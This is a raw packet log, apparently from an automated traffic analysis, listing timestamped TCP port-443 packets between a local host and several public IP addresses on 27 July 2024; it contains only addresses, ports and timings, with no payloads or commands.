                                                                              Jul 27, 2024 14:53:31.610061884 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.610126019 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.610634089 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.610687017 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.611536980 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.611593008 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.613271952 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.613332987 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.613984108 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.614038944 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.615407944 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.615461111 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.616529942 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.616584063 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.617384911 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.617453098 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.618556023 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.618613958 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.619457006 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.619513035 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.619613886 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.620321989 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.620378971 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.621390104 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.621443987 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.622417927 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.622489929 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.623326063 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.623380899 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.623410940 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.623506069 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.623526096 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.623554945 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.657757044 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.870335102 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.870364904 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.898168087 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.898252010 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.898390055 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.899605036 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.899641037 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.952450037 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:31.952538013 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.953922987 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.953948975 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:31.954476118 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:31.955509901 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.956829071 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.956876040 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:31.956959009 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.956974983 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:32.260474920 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:32.260581017 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:32.261106968 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:32.278590918 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:32.278635979 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:32.278665066 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:32.278681040 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:32.396521091 CEST49783443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:32.396564007 CEST44349783107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:32.396694899 CEST49783443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:32.399363041 CEST49783443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:32.399390936 CEST44349783107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:32.532862902 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.542422056 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.542450905 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.761559010 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:32.761652946 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:32.761863947 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:32.761931896 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:32.761966944 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:32.811167955 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.811336994 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.811405897 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.811435938 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.815830946 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.815907001 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.815923929 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.815972090 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.821542978 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.821624994 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.900010109 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.900202036 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.900278091 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.900342941 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.901073933 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.901144028 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.902061939 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.902123928 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.908020973 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.908082008 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.913949013 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.914025068 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.924742937 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.924808025 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.930577993 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.930656910 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.941201925 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.941392899 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.988775015 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.988977909 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.989622116 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.989696026 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.990432978 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.990497112 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.991842031 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.991909027 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.992816925 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.992894888 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:32.993766069 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:32.993823051 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.004343033 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.004426956 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.005162954 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.005239010 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.006712914 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.006779909 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.008749962 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.008820057 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.013477087 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.013556957 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.016647100 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.016724110 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.020701885 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.020782948 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.025752068 CEST44349783107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:33.025840998 CEST49783443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:33.026940107 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.027009010 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.029432058 CEST49783443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:33.029453993 CEST44349783107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:33.029989958 CEST49783443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:33.030000925 CEST44349783107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:33.030092955 CEST44349783107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:33.030111074 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.030173063 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.030253887 CEST49783443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:33.030283928 CEST44349783107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:33.078598022 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.078798056 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.078910112 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.078979015 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.079453945 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.079519033 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.081212044 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.081279993 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.082161903 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.082240105 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.083168983 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.083235025 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.085875988 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.085896015 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.085932970 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.085990906 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.086028099 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.086061001 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.086492062 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.086565971 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.086586952 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.087129116 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.088515043 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.088587046 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.093940020 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.094014883 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.094356060 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.094440937 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.098337889 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.098422050 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.104652882 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.104743958 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.105175018 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.105257988 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.106055021 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.106129885 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.106913090 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.106980085 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.114732981 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.114814043 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.115258932 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.115319967 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.116146088 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.116209030 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.117681980 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.117753983 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.118892908 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.118957043 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.119617939 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.119679928 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.119755983 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.124840021 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.124912977 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.155400038 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.168319941 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.168390036 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.168905973 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.168963909 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.169780970 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.169847965 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.170634031 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.170692921 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.171418905 CEST49784443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:33.171468973 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.171499014 CEST44349784188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:33.171530008 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.171576977 CEST49784443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:33.171966076 CEST49784443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:33.172000885 CEST44349784188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:33.172348022 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.172414064 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.173306942 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.173382044 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.173670053 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.174086094 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.174149990 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.175020933 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.175090075 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.175720930 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.175781012 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.176687956 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.176749945 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.176800966 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.176856995 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.177614927 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.177687883 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.178488016 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.178550959 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.179439068 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.179506063 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.180396080 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.180459023 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.180525064 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.180592060 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.181308985 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.181369066 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.182121992 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.182185888 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.182892084 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.182956934 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.183578968 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.183644056 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.186829090 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.186891079 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.186930895 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.186996937 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.192152977 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.192259073 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.192270994 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.192301035 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.192329884 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.192354918 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.197757006 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.197849989 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.197881937 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.197951078 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.201317072 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.251343012 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.251430988 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.252917051 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.252986908 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.253007889 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.253045082 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.253079891 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.253102064 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.253653049 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.253725052 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.254442930 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.254507065 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.255949020 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.256015062 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.256603003 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.256675959 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.257285118 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.257349968 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.257388115 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.257452965 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.258574009 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.258641958 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.258677959 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.258738995 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.259156942 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.259229898 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.259948015 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.260018110 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.260062933 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.260138035 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.260845900 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.260915041 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.261734009 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.261799097 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.262154102 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.262214899 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.262658119 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.262722015 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.262761116 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.262820005 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.263537884 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.263607979 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.264190912 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.264250040 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.264633894 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.264691114 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.269809008 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.269881010 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.270176888 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.270248890 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.272128105 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.272192955 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.272537947 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.272603989 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.281296968 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.281372070 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.281698942 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.281774998 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.287307978 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.287388086 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.288288116 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.288367033 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.289730072 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.289802074 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.290139914 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.290206909 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.292949915 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.293024063 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.293293953 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.293363094 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.296102047 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.296176910 CEST49782443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:33.296430111 CEST4434978231.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:33.296514988 CEST49782443192.168.2.431.14.70.245
